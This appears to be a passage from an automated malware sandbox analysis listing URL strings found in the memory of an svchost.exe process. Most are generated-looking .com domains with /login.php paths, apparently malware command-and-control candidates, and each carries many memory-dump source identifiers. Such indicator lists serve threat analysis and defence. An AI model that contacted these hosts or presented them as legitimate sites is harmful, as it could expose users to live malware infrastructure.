    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjuf.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824832708.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1829965352.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykak.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669888857.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyput.com/login.php
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/PWD
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/login.php
    Source: svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyret.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzyk.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybof.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycac.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowydef.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowydet.com/
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609566832.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowygem.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykaf.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykaf.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowymyk.com/login.php
    Source: svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypit.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrec.com/login.php
    Source: svchost.exe, 00000002.00000003.1533810433.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544974301.00000000060BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549703293.0000000002961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551
    Source: svchost.exe, 00000002.00000003.1786690664.0000000003A53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820437280.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835924985.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801377333.0000000006112000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812456647.0000000003A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786776968.0000000003A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808463283.0000000003A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-4491-9018-901015a08e06
    Source: svchost.exe, 00000002.00000003.1807684932.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1802346554.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-4491-9018-901015a08e06D
    Source: svchost.exe, 00000002.00000003.1720324170.0000000003D3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525612598.0000000006120000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418221274.0000000006020000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695350139.000000000297B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.000000000611A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674226226.00000000060B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820622823.000000000611E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044301791.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677832780.00000000060A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677975921.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641502203.0000000002983000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1993670887.0000000003A87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432243454.0000000000879000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638303559.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127671.000000000611E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975287913.000000000611B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2678998805.000000000B5DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607336213.0000000002991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466208925.000000000611A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877944704.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
    Source: svchost.exe, 00000002.00000003.1841497511.000000000611B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682790360.0000000006110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667403036.000000000297D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592820516.0000000006122000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874568209.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873537120.0000000003A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592820516.000000000611E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084022478.0000000006120000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069850659.0000000006117000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715980125.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801377333.0000000006109000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2563025467.000000000B5CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664154840.0000000003A6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592702110.000000000611E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613731078.0000000006112000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681672330.000000000610B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874568209.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417486561.000000000602F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559104828.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554774981.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603264595.00000000060BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
    Source: svchost.exe, 00000002.00000003.1835900556.0000000002994000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862548054.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtD
    Source: svchost.exe, 00000002.00000003.1562152424.00000000060A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664120149.0000000002996000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835900556.0000000002997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtw
    Source: svchost.exe, 00000002.00000003.1580923507.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571338690.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725860840.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609455387.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632041925.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046327145.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611062842.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527970055.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1988946544.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1718565639.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648233007.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700188363.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594762248.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527318064.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1440609278.0000000006011000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817173228.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2675029502.000000000B442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579566890.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664821246.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597677482.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526566805.0000000006131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
    Source: svchost.exe, 00000002.00000003.2046327145.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611062842.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527970055.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1988946544.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648233007.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700188363.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594762248.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527318064.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817173228.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579566890.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664821246.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597677482.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697141257.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634577560.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051783856.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786779268.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590640072.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662137463.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244104.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720435579.000000000B46F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ampproject.org
    Source: svchost.exe, 00000002.00000003.1533810433.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564447175.0000000002961000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648228122.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609456988.0000000002961000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892239324.000000000295E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613758963.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579927626.0000000002963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599344474.000000000295F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063349104.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527970055.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667733109.0000000002960000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077499821.000000000295E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2620626150.0000000006148000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638289003.0000000002961000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798683118.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460509147.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798156248.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1441699638.00000000060AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849373410.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035885648.0000000002965000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655978559.0000000002965000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
    Source: svchost.exe, 00000002.00000003.1531698228.000000000297F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525879712.000000000297F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/
    Source: svchost.exe, 00000002.00000003.2105942835.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046327145.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526548460.00000000060A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892239324.000000000295E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063349104.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527970055.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077499821.000000000295E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544780287.00000000060A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1988946544.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1718565639.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798683118.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798156248.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849373410.0000000002964000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035885648.0000000002965000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727903927.000000000297E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063012726.0000000002960000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527318064.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2037344088.000000000295E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526548460.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715999388.0000000002961000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798519939.000000000295F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
    Source: svchost.exe, 00000002.00000003.1580923507.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1571338690.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725860840.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609455387.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632041925.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046327145.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611062842.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527970055.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1988946544.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648233007.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700188363.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594762248.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1527318064.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817173228.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579566890.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664821246.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597677482.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526566805.0000000006131000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697141257.000000000B46F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634577560.000000000B474000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/wp-json/
